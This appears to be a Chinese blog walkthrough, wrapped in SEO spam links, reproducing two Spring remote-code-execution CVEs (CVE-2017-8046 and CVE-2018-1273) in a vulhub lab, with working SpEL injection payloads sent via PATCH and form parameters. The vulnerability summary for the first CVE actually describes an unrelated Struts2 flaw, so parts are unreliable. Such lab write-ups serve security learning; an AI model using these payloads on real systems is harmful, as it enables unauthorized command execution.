当前位置: 首页 > wzjs >正文

杭州网站推广优化哪里好网络安全培训机构哪家好

杭州网站推广优化哪里好,网络安全培训机构哪家好,好看的网页设计公司,怎么用node做动态网站一、CVE-2017-8046-Spring Data Rest 远程命令执行命令 漏洞环境 vulhub靶场 /spring/CVE-2017-8046 漏洞简介 漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞…

一、CVE-2017-8046-Spring Data Rest 远程命令执行命令

漏洞环境

vulhub靶场 /spring/CVE-2017-8046

漏洞简介

漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞的发⽣。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使⽤通配符namespace,从⽽导致远程代码执⾏漏洞的发⽣。

第一步:开启靶场,访问漏洞页面

#URL
http://47.103.81.25:8080/customers/1
第二步:在本页面抓包,构造payload

#请求方式
先右键修改请求方式改为POST,再直接将POST改为PATCH#Content-Typ
application/json-patch+json#发送数据
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,101}))/lastname", "value": "vulhub" }]#数据中
new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115} 表示的命令 touch /tmp/success ⾥⾯的数字是ascii码
第三步:在云服务器进入此靶场容器的终端

#命令docker ps查看容器id
77e610fd0066#进入终端
docker exec -it 77e610fd0066 /bin/bash
第四步:打开bp,发送后,返回云服务器切换到/tmp目录,查看文件,成功上传

二、CVE-2018-1273-Spring代码执行漏洞

漏洞简介

Spring Data 是⼀个⽤于简化数据库访问,并⽀持云服务的开源框架,Spring Data Commons 是 Spring Data下所有⼦项⽬共享的基础框架。Spring Data Commons 在 2.0.5 及以前版本中,存在⼀处 SpEL 表达式注⼊漏洞,攻击者可以注⼊恶意 SpEL 表达式以执⾏任意命令。

第一步:访问靶场地址
#URL
http://47.103.81.25:8080/users
第二步:填写注册信息,bp抓包,发送到重放器

第三步:删除提交的内容,构造payload

#构造payload
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/iyu")]=&password=&repeatedPassword=
第四步:在云服务器进入此靶场容器的终端,查看是否成功上传文件

#命令docker ps查看容器id
769e92400e15#进入终端
docker exec -it 769e92400e15 /bin/bash#查看是否成功上传
ls /tmp

                                                                                                                                FROM  IYU_

http://www.dtcms.com/wzjs/311917.html

相关文章:

  • 太原做网站如何制作一个网站
  • 顶呱呱网站建设价格百度一下就知道官网
  • 网站开发者id如何在百度推广自己的产品
  • 设计师对网站的意义百度门店推广
  • 中企动力制作的网站百度权重10的网站
  • win2008搭建php网站百度导航下载2020新版语音
  • 自己本地可以做网站服务器吗长春模板建站代理
  • 可视化网站制作火狐搜索引擎
  • 在哪查询网站做的哪些外链开封搜索引擎优化
  • 高校网站安全建设方案做外贸有哪些网站平台
  • 一级域名的网站怎么做电子商务营销策划方案
  • 织梦免费自适应网站模板最近几天新闻大事
  • 发展和建设委员会官方网站历下区百度seo
  • 松江新城网站建设如何找做网站的公司
  • 蓝海网站建设360指数官网
  • 专门做食品的网站友情链接举例
  • 公司网站建设属于什么费用宁波seo外包优化
  • 如何让客户做网站百度推广app怎么收费
  • 如何做公司培训网站免费线上培训平台
  • 中山市做网站实力网络营销团队
  • 杭州好的做网站公司外贸平台app
  • wordpress 缩略图判断百度app优化
  • 怎么做简单的钓鱼网站低价刷粉网站推广
  • 360关键词竞价网站网址大全浏览器主页
  • 绵阳专门做网站的公司有哪些网站建设开发公司
  • 乐陵市住房和城乡建设局网站网页设计自学要多久
  • 网站进入百度沙盒企业网站的推广形式有
  • 网站建设和推广如何自己建网站
  • 公司网站建设的相关建议网址注册
  • 创业网站开发要多少钱网盘资源搜索神器